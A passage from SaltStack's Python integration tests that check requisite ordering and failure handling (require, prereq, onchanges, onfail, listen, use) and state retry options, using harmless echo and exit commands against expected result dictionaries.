result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
ret = self.run_function('state.sls', mods='requisites.require_error1')
self.assertEqual(ret, [
"Cannot extend ID 'W' in 'base:requisites.require_error1'. It is not part of the high state.\nThis is likely due to a missing include statement or an incorrectly typed ID.\nEnsure that a state with an ID of 'W' is available\nin environment 'base' and to SLS 'requisites.require_error1'"
])
# issue #8235
# FIXME: Why is require enforcing list syntax while require_in does not?
# And why preventing it?
# Currently this state fails, should return C/B/A
result = {}
ret = self.run_function('state.sls', mods='requisites.require_simple_nolist')
self.assertEqual(ret, [
'The require statement in state \'B\' in SLS '
+ '\'requisites.require_simple_nolist\' needs to be formed as a list'
])
# commented until a fix is made for issue #8772
# TODO: this test actually fails
#ret = self.run_function('state.sls', mods='requisites.require_error2')
#self.assertEqual(ret, [
# 'Cannot extend state foobar for ID A in "base:requisites.require_error2".'
# + ' It is not part of the high state.'
#])
ret = self.run_function('state.sls', mods='requisites.require_recursion_error1')
self.assertEqual(
ret,
['A recursive requisite was found, SLS "requisites.require_recursion_error1" ID "B" ID "A"']
)
def test_requisites_require_any(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 3,
'comment': 'Command "echo A" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-$(which false)_|-run': {
'__run_num__': 1,
'comment': 'Command "$(which false)" run',
'result': False,
'changes': True,
},
'cmd_|-D_|-echo D_|-run': {
'__run_num__': 2,
'comment': 'Command "echo D" run',
'result': True,
'changes': True,
},
}
ret = self.run_function('state.sls', mods='requisites.require_any')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_require_any_fail(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
ret = self.run_function('state.sls', mods='requisites.require_any_fail')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertIn('One or more requisite failed',
result['cmd_|-D_|-echo D_|-run']['comment'])
def test_requisites_watch_any(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
if salt.utils.platform.is_windows():
cmd_true = 'exit'
cmd_false = 'exit /B 1'
else:
cmd_true = 'true'
cmd_false = 'false'
expected_result = {
'cmd_|-A_|-{0}_|-wait'.format(cmd_true): {
'__run_num__': 4,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-B_|-{0}_|-run'.format(cmd_true): {
'__run_num__': 0,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-C_|-{0}_|-run'.format(cmd_false): {
'__run_num__': 1,
'comment': 'Command "{0}" run'.format(cmd_false),
'result': False,
'changes': True,
},
'cmd_|-D_|-{0}_|-run'.format(cmd_true): {
'__run_num__': 2,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-E_|-{0}_|-wait'.format(cmd_true): {
'__run_num__': 9,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-F_|-{0}_|-run'.format(cmd_true): {
'__run_num__': 5,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-G_|-{0}_|-run'.format(cmd_false): {
'__run_num__': 6,
'comment': 'Command "{0}" run'.format(cmd_false),
'result': False,
'changes': True,
},
'cmd_|-H_|-{0}_|-run'.format(cmd_false): {
'__run_num__': 7,
'comment': 'Command "{0}" run'.format(cmd_false),
'result': False,
'changes': True,
},
}
ret = self.run_function('state.sls', mods='requisites.watch_any')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_watch_any_fail(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
ret = self.run_function('state.sls', mods='requisites.watch_any_fail')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertIn('One or more requisite failed',
result['cmd_|-A_|-true_|-wait']['comment'])
def test_requisites_onchanges_any(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-another_changing_state_|-echo "Changed!"_|-run': {
'__run_num__': 1,
'changes': True,
'comment': 'Command "echo "Changed!"" run',
'result': True
},
'cmd_|-changing_state_|-echo "Changed!"_|-run': {
'__run_num__': 0,
'changes': True,
'comment': 'Command "echo "Changed!"" run',
'result': True
},
'cmd_|-test_one_changing_states_|-echo "Success!"_|-run': {
'__run_num__': 4,
'changes': True,
'comment': 'Command "echo "Success!"" run',
'result': True
},
'cmd_|-test_two_non_changing_states_|-echo "Should not run"_|-run': {
'__run_num__': 5,
'changes': False,
'comment': 'State was not run because none of the onchanges reqs changed',
'result': True
},
'pip_|-another_non_changing_state_|-mock_|-installed': {
'__run_num__': 3,
'changes': False,
'comment': 'Python package mock was already installed\nAll specified packages are already installed',
'result': True
},
'pip_|-non_changing_state_|-mock_|-installed': {
'__run_num__': 2,
'changes': False,
'comment': 'Python package mock was already installed\nAll specified packages are already installed',
'result': True
}
}
ret = self.run_function('state.sls', mods='requisites.onchanges_any')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_onfail_any(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-a_|-exit 0_|-run': {
'__run_num__': 0,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-b_|-exit 1_|-run': {
'__run_num__': 1,
'changes': True,
'comment': 'Command "exit 1" run',
'result': False
},
'cmd_|-c_|-exit 0_|-run': {
'__run_num__': 2,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-d_|-echo itworked_|-run': {
'__run_num__': 3,
'changes': True,
'comment': 'Command "echo itworked" run',
'result': True},
'cmd_|-e_|-exit 0_|-run': {
'__run_num__': 4,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-f_|-exit 0_|-run': {
'__run_num__': 5,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-g_|-exit 0_|-run': {
'__run_num__': 6,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-h_|-echo itworked_|-run': {
'__run_num__': 7,
'changes': False,
'comment': 'State was not run because onfail req did not change',
'result': True
}
}
ret = self.run_function('state.sls', mods='requisites.onfail_any')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_full_sls(self):
'''
Teste the sls special command in requisites
'''
expected_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C" run',
'result': True,
'changes': True},
}
ret = self.run_function('state.sls', mods='requisites.fullsls_require')
self.assertReturnNonEmptySaltType(ret)
result = self.normalize_ret(ret)
self.assertEqual(expected_result, result)
# issue #8233: traceback on prereq sls
# TODO: not done
#ret = self.run_function('state.sls', mods='requisites.fullsls_prereq')
#self.assertEqual(['sls command can only be used with require requisite'], ret)
def test_requisites_require_no_state_module(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-A_|-echo A fifth_|-run': {
'__run_num__': 4,
'comment': 'Command "echo A fifth" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B second" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-echo C third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo C third" run',
'result': True,
'changes': True,
},
'cmd_|-D_|-echo D first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo D first" run',
'result': True,
'changes': True,
},
'cmd_|-E_|-echo E fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo E fourth" run',
'result': True,
'changes': True,
},
'cmd_|-G_|-echo G_|-run': {
'__run_num__': 5,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' id: Z\n',
'result': False,
'changes': False,
},
'cmd_|-H_|-echo H_|-run': {
'__run_num__': 6,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' id: Z\n',
'result': False,
'changes': False,
}
}
ret = self.run_function('state.sls', mods='requisites.require_no_state_module')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_prereq_simple_ordering_and_errors(self):
'''
Call sls file containing several prereq_in and prereq.
Ensure that some of them are failing and that the order is right.
'''
expected_result_simple = {
'cmd_|-A_|-echo A third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A third" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B first" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-I_|-echo I_|-run': {
'__run_num__': 3,
'comment': 'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' cmd: Z\n',
'result': False,
'changes': False},
'cmd_|-J_|-echo J_|-run': {
'__run_num__': 4,
'comment': 'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' foobar: A\n',
'result': False,
'changes': False}
}
expected_result_simple_no_state_module = {
'cmd_|-A_|-echo A third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A third" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B first" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-I_|-echo I_|-run': {
'__run_num__': 3,
'comment': 'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' id: Z\n',
'result': False,
'changes': False}
}
expected_result_simple2 = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 1,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 2,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 0,
'comment': 'Command "echo C" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D_|-run': {
'__run_num__': 3,
'comment': 'Command "echo D" run',
'result': True,
'changes': True},
'cmd_|-E_|-echo E_|-run': {
'__run_num__': 4,
'comment': 'Command "echo E" run',
'result': True,
'changes': True}
}
expected_result_simple3 = {
'cmd_|-A_|-echo A first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo A first" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B second" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-echo C third_|-wait': {
'__run_num__': 2,
'comment': '',
'result': True,
'changes': False,
}
}
expected_result_complex = {
'cmd_|-A_|-echo A fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo A fourth" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B first" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo D third" run',
'result': True,
'changes': True},
}
ret = self.run_function('state.sls', mods='requisites.prereq_simple')
self.assertReturnNonEmptySaltType(ret)
result = self.normalize_ret(ret)
self.assertEqual(expected_result_simple, result)
# same test, but not using lists in yaml syntax
# TODO: issue #8235, prereq ignored when not used in list syntax
# Currently fails badly with :
# TypeError encountered executing state.sls: string indices must be integers, not str.
#expected_result_simple.pop('cmd_|-I_|-echo I_|-run')
#expected_result_simple.pop('cmd_|-J_|-echo J_|-run')
#ret = self.run_function('state.sls', mods='requisites.prereq_simple_nolist')
#result = self.normalize_ret(ret)
#self.assertEqual(expected_result_simple, result)
ret = self.run_function('state.sls', mods='requisites.prereq_simple2')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result_simple2, result)
ret = self.run_function('state.sls', mods='requisites.prereq_simple3')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result_simple3, result)
#ret = self.run_function('state.sls', mods='requisites.prereq_error_nolist')
#self.assertEqual(
# ret,
# ['Cannot extend ID Z in "base:requisites.prereq_error_nolist".'
# + ' It is not part of the high state.']
#)
ret = self.run_function('state.sls', mods='requisites.prereq_compile_error1')
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(
ret['cmd_|-B_|-echo B_|-run']['comment'],
'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' foobar: A\n'
)
ret = self.run_function('state.sls', mods='requisites.prereq_compile_error2')
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(
ret['cmd_|-B_|-echo B_|-run']['comment'],
'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' foobar: C\n'
)
ret = self.run_function('state.sls', mods='requisites.prereq_complex')
result = self.normalize_ret(ret)
self.assertEqual(expected_result_complex, result)
# issue #8210 : prereq recursion undetected
# TODO: this test fails
#ret = self.run_function('state.sls', mods='requisites.prereq_recursion_error')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_recursion_error" ID "B" ID "A"']
#)
ret = self.run_function('state.sls', mods='requisites.prereq_simple_no_state_module')
result = self.normalize_ret(ret)
self.assertEqual(expected_result_simple_no_state_module, result)
def test_infinite_recursion_sls_prereq(self):
ret = self.run_function('state.sls', mods='requisites.prereq_sls_infinite_recursion')
self.assertSaltTrueReturn(ret)
def test_requisites_use(self):
'''
Call sls file containing several use_in and use.
'''
# TODO issue #8235 & #8774 some examples are still commented in the test file
ret = self.run_function('state.sls', mods='requisites.use')
self.assertReturnNonEmptySaltType(ret)
for item, descr in six.iteritems(ret):
self.assertEqual(descr['comment'], 'onlyif condition is false')
# TODO: issue #8802 : use recursions undetected
# issue is closed as use does not actually inherit requisites
# if chain-use is added after #8774 resolution theses tests would maybe become useful
#ret = self.run_function('state.sls', mods='requisites.use_recursion')
#self.assertEqual(ret, [
# 'A recursive requisite was found, SLS "requisites.use_recursion"'
# + ' ID "B" ID "A"'
#])
#ret = self.run_function('state.sls', mods='requisites.use_recursion2')
#self.assertEqual(ret, [
# 'A recursive requisite was found, SLS "requisites.use_recursion2"'
# + ' ID "C" ID "A"'
#])
#ret = self.run_function('state.sls', mods='requisites.use_auto_recursion')
#self.assertEqual(ret, [
# 'A recursive requisite was found, SLS "requisites.use_recursion"'
# + ' ID "A" ID "A"'
#])
def test_requisites_use_no_state_module(self):
'''
Call sls file containing several use_in and use.
'''
ret = self.run_function('state.sls', mods='requisites.use_no_state_module')
self.assertReturnNonEmptySaltType(ret)
for item, descr in six.iteritems(ret):
self.assertEqual(descr['comment'], 'onlyif condition is false')
def test_get_file_from_env_in_top_match(self):
tgt = os.path.join(TMP, 'prod-cheese-file')
try:
ret = self.run_function(
'state.highstate', minion_tgt='sub_minion'
)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isfile(tgt))
with salt.utils.files.fopen(tgt, 'r') as cheese:
data = salt.utils.stringutils.to_unicode(cheese.read())
self.assertIn('Gromit', data)
self.assertIn('Comte', data)
finally:
if os.path.islink(tgt):
os.unlink(tgt)
# onchanges tests
def test_onchanges_requisite(self):
'''
Tests a simple state using the onchanges requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_simple')
# First, test the result of the state run when changes are expected to happen
test_data = state_run['cmd_|-test_changing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when changes are not expected to happen
test_data = state_run['cmd_|-test_non_changing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because none of the onchanges reqs changed'
self.assertIn(expected_result, test_data)
def test_onchanges_requisite_multiple(self):
'''
Tests a simple state using the onchanges requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls',
mods='requisites.onchanges_multiple')
# First, test the result of the state run when two changes are expected to happen
test_data = state_run['cmd_|-test_two_changing_states_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when two changes are not expected to happen
test_data = state_run['cmd_|-test_two_non_changing_states_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because none of the onchanges reqs changed'
self.assertIn(expected_result, test_data)
# Finally, test the result of the state run when only one of the onchanges requisites changes.
test_data = state_run['cmd_|-test_one_changing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
def test_onchanges_in_requisite(self):
'''
Tests a simple state using the onchanges_in requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_in_simple')
# First, test the result of the state run of when changes are expected to happen
test_data = state_run['cmd_|-test_changes_expected_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when changes are not expected to happen
test_data = state_run['cmd_|-test_changes_not_expected_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because none of the onchanges reqs changed'
self.assertIn(expected_result, test_data)
def test_onchanges_requisite_no_state_module(self):
'''
Tests a simple state using the onchanges requisite without state modules
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_simple_no_state_module')
test_data = state_run['cmd_|-test_changing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
def test_onchanges_requisite_with_duration(self):
'''
Tests a simple state using the onchanges requisite
the state will not run but results will include duration
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_simple')
# Then, test the result of the state run when changes are not expected to happen
# and ensure duration is included in the results
test_data = state_run['cmd_|-test_non_changing_state_|-echo "Should not run"_|-run']
self.assertIn('duration', test_data)
# onfail tests
def test_onfail_requisite(self):
'''
Tests a simple state using the onfail requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_simple')
# First, test the result of the state run when a failure is expected to happen
test_data = state_run['cmd_|-test_failing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because onfail req did not change'
self.assertIn(expected_result, test_data)
def test_multiple_onfail_requisite(self):
'''
test to ensure state is run even if only one
of the onfails fails. This is a test for the issue:
https://github.com/saltstack/salt/issues/22370
'''
state_run = self.run_function('state.sls', mods='requisites.onfail_multiple')
retcode = state_run['cmd_|-c_|-echo itworked_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
stdout = state_run['cmd_|-c_|-echo itworked_|-run']['changes']['stdout']
self.assertEqual(stdout, 'itworked')
def test_onfail_in_requisite(self):
'''
Tests a simple state using the onfail_in requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_in_simple')
# First, test the result of the state run when a failure is expected to happen
test_data = state_run['cmd_|-test_failing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because onfail req did not change'
self.assertIn(expected_result, test_data)
def test_onfail_requisite_no_state_module(self):
'''
Tests a simple state using the onfail requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_simple_no_state_module')
# First, test the result of the state run when a failure is expected to happen
test_data = state_run['cmd_|-test_failing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because onfail req did not change'
self.assertIn(expected_result, test_data)
def test_onfail_requisite_with_duration(self):
'''
Tests a simple state using the onfail requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_simple')
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']
self.assertIn('duration', test_data)
def test_multiple_onfail_requisite_with_required(self):
'''
test to ensure multiple states are run
when specified as onfails for a single state.
This is a test for the issue:
https://github.com/saltstack/salt/issues/46552
'''
state_run = self.run_function('state.sls', mods='requisites.onfail_multiple_required')
retcode = state_run['cmd_|-b_|-echo b_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
retcode = state_run['cmd_|-c_|-echo c_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
retcode = state_run['cmd_|-d_|-echo d_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
stdout = state_run['cmd_|-b_|-echo b_|-run']['changes']['stdout']
self.assertEqual(stdout, 'b')
stdout = state_run['cmd_|-c_|-echo c_|-run']['changes']['stdout']
self.assertEqual(stdout, 'c')
stdout = state_run['cmd_|-d_|-echo d_|-run']['changes']['stdout']
self.assertEqual(stdout, 'd')
def test_multiple_onfail_requisite_with_required_no_run(self):
'''
test to ensure multiple states are not run
when specified as onfails for a single state
which fails.
This is a test for the issue:
https://github.com/saltstack/salt/issues/46552
'''
state_run = self.run_function('state.sls', mods='requisites.onfail_multiple_required_no_run')
expected = 'State was not run because onfail req did not change'
stdout = state_run['cmd_|-b_|-echo b_|-run']['comment']
self.assertEqual(stdout, expected)
stdout = state_run['cmd_|-c_|-echo c_|-run']['comment']
self.assertEqual(stdout, expected)
stdout = state_run['cmd_|-d_|-echo d_|-run']['comment']
self.assertEqual(stdout, expected)
# listen tests
def test_listen_requisite(self):
'''
Tests a simple state using the listen requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_simple')
# First, test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listening_change_state_|-echo "Listening State"_|-mod_watch'
self.assertIn(listener_state, state_run)
# Then, test the result of the state run when a listener should not trigger
absent_state = 'cmd_|-listener_test_listening_non_changing_state_|-echo "Only run once"_|-mod_watch'
self.assertNotIn(absent_state, state_run)
def test_listen_in_requisite(self):
'''
Tests a simple state using the listen_in requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_in_simple')
# First, test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listening_change_state_|-echo "Listening State"_|-mod_watch'
self.assertIn(listener_state, state_run)
# Then, test the result of the state run when a listener should not trigger
absent_state = 'cmd_|-listener_test_listening_non_changing_state_|-echo "Only run once"_|-mod_watch'
self.assertNotIn(absent_state, state_run)
def test_listen_in_requisite_resolution(self):
'''
Verify listen_in requisite lookups use ID declaration to check for changes
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_in_simple')
# Test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listen_in_resolution_|-echo "Successful listen_in resolution"_|-mod_watch'
self.assertIn(listener_state, state_run)
def test_listen_requisite_resolution(self):
'''
Verify listen requisite lookups use ID declaration to check for changes
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_simple')
# Both listeners are expected to trigger
listener_state = 'cmd_|-listener_test_listening_resolution_one_|-echo "Successful listen resolution"_|-mod_watch'
self.assertIn(listener_state, state_run)
listener_state = 'cmd_|-listener_test_listening_resolution_two_|-echo "Successful listen resolution"_|-mod_watch'
self.assertIn(listener_state, state_run)
def test_listen_requisite_no_state_module(self):
'''
Tests a simple state using the listen requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_simple_no_state_module')
# First, test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listening_change_state_|-echo "Listening State"_|-mod_watch'
self.assertIn(listener_state, state_run)
# Then, test the result of the state run when a listener should not trigger
absent_state = 'cmd_|-listener_test_listening_non_changing_state_|-echo "Only run once"_|-mod_watch'
self.assertNotIn(absent_state, state_run)
def test_listen_in_requisite_resolution_names(self):
'''
Verify listen_in requisite lookups use ID declaration to check for changes
and resolves magic names state variable
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_in_names')
self.assertIn('test_|-listener_service_|-nginx_|-mod_watch', state_run)
self.assertIn('test_|-listener_service_|-crond_|-mod_watch', state_run)
def test_listen_requisite_resolution_names(self):
'''
Verify listen requisite lookups use ID declaration to check for changes
and resolves magic names state variable
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_names')
self.assertIn('test_|-listener_service_|-nginx_|-mod_watch', state_run)
self.assertIn('test_|-listener_service_|-crond_|-mod_watch', state_run)
def test_issue_30820_requisite_in_match_by_name(self):
'''
This tests the case where a requisite_in matches by name instead of ID
See https://github.com/saltstack/salt/issues/30820 for more info
'''
state_run = self.run_function(
'state.sls',
mods='requisites.requisite_in_match_by_name'
)
bar_state = 'cmd_|-bar state_|-echo bar_|-wait'
self.assertIn(bar_state, state_run)
self.assertEqual(state_run[bar_state]['comment'],
'Command "echo bar" run')
def test_retry_option_defaults(self):
'''
test the retry option on a simple state with defaults
ensure comment is as expected
ensure state duration is greater than default retry_interval (30 seconds)
'''
state_run = self.run_function(
'state.sls',
mods='retry.retry_defaults'
)
retry_state = 'file_|-file_test_|-/path/to/a/non-existent/file.txt_|-exists'
expected_comment = ('Attempt 1: Returned a result of "False", with the following '
'comment: "Specified path /path/to/a/non-existent/file.txt does not exist"\n'
'Specified path /path/to/a/non-existent/file.txt does not exist')
self.assertEqual(state_run[retry_state]['comment'], expected_comment)
self.assertTrue(state_run[retry_state]['duration'] > 30)
self.assertEqual(state_run[retry_state]['result'], False)
def test_retry_option_custom(self):
'''
test the retry option on a simple state with custom retry values
ensure comment is as expected
ensure state duration is greater than custom defined interval * (retries - 1)
'''
state_run = self.run_function(
'state.sls',
mods='retry.retry_custom'
)
retry_state = 'file_|-file_test_|-/path/to/a/non-existent/file.txt_|-exists'
expected_comment = ('Attempt 1: Returned a result of "False", with the following '
'comment: "Specified path /path/to/a/non-existent/file.txt does not exist"\n'
'Attempt 2: Returned a result of "False", with the following comment: "Specified'
' path /path/to/a/non-existent/file.txt does not exist"\nAttempt 3: Returned'
' a result of "False", with the following comment: "Specified path'
' /path/to/a/non-existent/file.txt does not exist"\nAttempt 4: Returned a'
' result of "False", with the following comment: "Specified path'
' /path/to/a/non-existent/file.txt does not exist"\nSpecified path'
' /path/to/a/non-existent/file.txt does not exist')
self.assertEqual(state_run[retry_state]['comment'], expected_comment)
self.assertTrue(state_run[retry_state]['duration'] > 40)
self.assertEqual(state_run[retry_state]['result'], False)
def test_retry_option_success(self):
'''
test a state with the retry option that should return True immedietly (i.e. no retries)
'''
testfile = os.path.join(TMP, 'retry_file')
state_run = self.run_function(
'state.sls',
mods='retry.retry_success'
)
os.unlink(testfile)
retry_state = 'file_|-file_test_|-{0}_|-exists'.format(testfile)
self.assertNotIn('Attempt', state_run[retry_state]['comment'])
def run_create(self):
'''
helper function to wait 30 seconds and then create the temp retry file
'''
testfile = os.path.join(TMP, 'retry_file')
time.sleep(30)
with salt.utils.files.fopen(testfile, 'a'):
pass
def test_retry_option_eventual_success(self):
'''
test a state with the retry option that should return True after at least 4 retry attmempt
but never run 15 attempts
'''
testfile = os.path.join(TMP, 'retry_file')
create_thread = threading.Thread(target=self.run_create)
create_thread.start()
state_run = self.run_function(
'state.sls',
mods='retry.retry_success2'
)
retry_state = 'file_|-file_test_|-{0}_|-exists'.format(testfile)
self.assertIn('Attempt 1:', state_run[retry_state]['comment'])
self.assertIn('Attempt 2:', state_run[retry_state]['comment'])
self.assertIn('Attempt 3:', state_run[retry_state]['comment'])
self.assertIn('Attempt 4:', state_run[retry_state]['comment'])
self.assertNotIn('Attempt 15:', state_run[retry_state]['comment'])
self.assertEqual(state_run[retry_state]['result'], True)
def test_issue_38683_require_order_failhard_combination(self):
'''
This tests the case where require, order, and failhard are all used together in a state definition.
Previously, the order option, which used in tandem with require and failhard, would cause the state
compiler to stacktrace. This exposed a logic error in the ``check_failhard`` function of the state
compiler. With the logic error resolved, this test should now pass.
See https://github.com/saltstack/salt/issues/38683 for more information.
'''
state_run = self.run_function(
'state.sls',
mods='requisites.require_order_failhard_combo'
)
state_id = 'test_|-b_|-b_|-fail_with_changes'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'], 'Failure!')
self.assertFalse(state_run[state_id]['result'])
def test_issue_46762_prereqs_on_a_state_with_unfulfilled_requirements(self):
'''
This tests the case where state C requires state A, which fails.
State C is a pre-required state for State B.
Since state A fails, state C will not run because the requisite failed,
therefore state B will not run because state C failed to run.
See https://github.com/saltstack/salt/issues/46762 for
more information.
'''
state_run = self.run_function(
'state.sls',
